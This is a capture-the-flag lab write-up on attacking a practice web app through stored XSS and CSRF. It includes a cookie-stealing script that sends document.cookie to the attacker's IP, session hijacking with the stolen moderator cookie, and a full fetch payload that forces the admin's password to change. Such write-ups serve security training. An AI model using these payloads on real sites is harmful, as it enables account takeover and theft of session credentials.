Target IP: 10.10.13.206
Challenge Description:
This challenge requires me to add the hostname worldwap.thm inside my /etc/hosts file first. After doing this, I ran a TCP port scan using the command sudo nmap -sS worldwap.thm -p- and identified there are three ports open on the target machine: SSH, HTTP, and another HTTP application on port 8081, as shown above.
After identifying three applications on the target machine, I performed an aggressive port scan against the three ports using the command sudo nmap -sV -A worldwap.thm -p 22,80,8081, as shown above. After this port scan, I obtained the result shown above. Since the challenge is to attack the web application via XSS/CSRF, time to enumerate the web applications.
Port 80: HTTP
Browsing to http://worldwap.thm returns the webpage shown above. I notice there is a Register button on the top of the web application.
The registeration webpage above is returned to me after pressing the Register button from the previous image. Right away, I notice the information message You can now pre-register! Your details will be reviewed by the site moderator.. Maybe I can perform XSS attack here, as the input details are checked by the moderator team. Maybe I can try to obtain the cookie of the moderator?
To test if the web application is vulnerable to XSS/CSRF attacks, I started a Python HTTP server on my machine using the command python3 -m http.server 80. Then I injected the payload <script>fetch("http://10.14.55.153/");</script> inside the different parameters.
After some manual testing, I noticed the parameter Name is vulnerable as I received the HTTP request made by the target machine to my machine on port 80. Now I can use the modified payload <script>fetch("http://10.14.55.153/" + btoa(document.cookie));</script> to obtain the cookie of the moderator of the website :)
And bingo! I registered using the details shown above. I inserted the cookie stealing payload <script>fetch("http://10.14.55.153/" + btoa(document.cookie));</script> inside the Name parameter and obtained the cookie of the user moderator as shown above.
After decoding this value using the Decoder tool offered by the Burp Suite, I obtained the result PHPSESSID=vegc1vmobcp87r0vdjuumhapvo as shown above. Now I can use the cookie vegc1vmobcp87r0vdjuumhapvo to gain access to the web application as the moderator.
I modified the PHPSESSID parameter to vegc1vmobcp87r0vdjuumhapvo directly on the web browser, as shown above.
After modifying the cookie value to the moderator's cookie value, I refreshed the webpage and obtained the result shown above. Now I have access to the web application as the moderator :) However, I did not find anything useful here. However, from previous enumeration when I tried to register as a user I identified the hostname login.worldwap.thm. Since I have moderator access on the web application, maybe I can access this web application as this same user too?
And bingo! Now I have access to the other web application as the moderator. I notice it is possible to change password. Maybe I can force to change the password of the user admin? There is also a chat application.
The chat application webpage is shown above. It can be used to talk to the admin? Maybe I can perform XSS attack here too?
I used the payload <script>alert(1);</script> first.
And yep. The chat application is vulnerable to XSS as the alert function was executed successfully. Time to test the Change Password functionality too.
I ran Burp Suite and changed the password of the user moderator to password, as shown above. When I intercepted the HTTP request, I notice there is one parameter called new_password where the password is sent in plaintext. I can force the admin user to change password.
To accomplish this, I used the Change Password functionality again as shown above on the web browser. Then I copied the result of POST request using Copy as Fetch, as shown above. Then I will need to modify the request parameters to force the password reset. The new script is shown above. I will need to deploy the following script inside the chat application to force reset the password of the user admin to password:
<script>fetch("/change_password.php", {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1"
},
"referrer": "/change_password.php",
"body": "new_password=password",
"method": "POST",
"mode": "cors"
});</script><script>fetch("/change_password.php", {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1"
},
"referrer": "/change_password.php",
"body": "new_password=password",
"method": "POST",
"mode": "cors"
});</script>
And after logging out of the web application as the moderator, I used the credentials admin:password to login and gained access to the web application as the admin. GG :)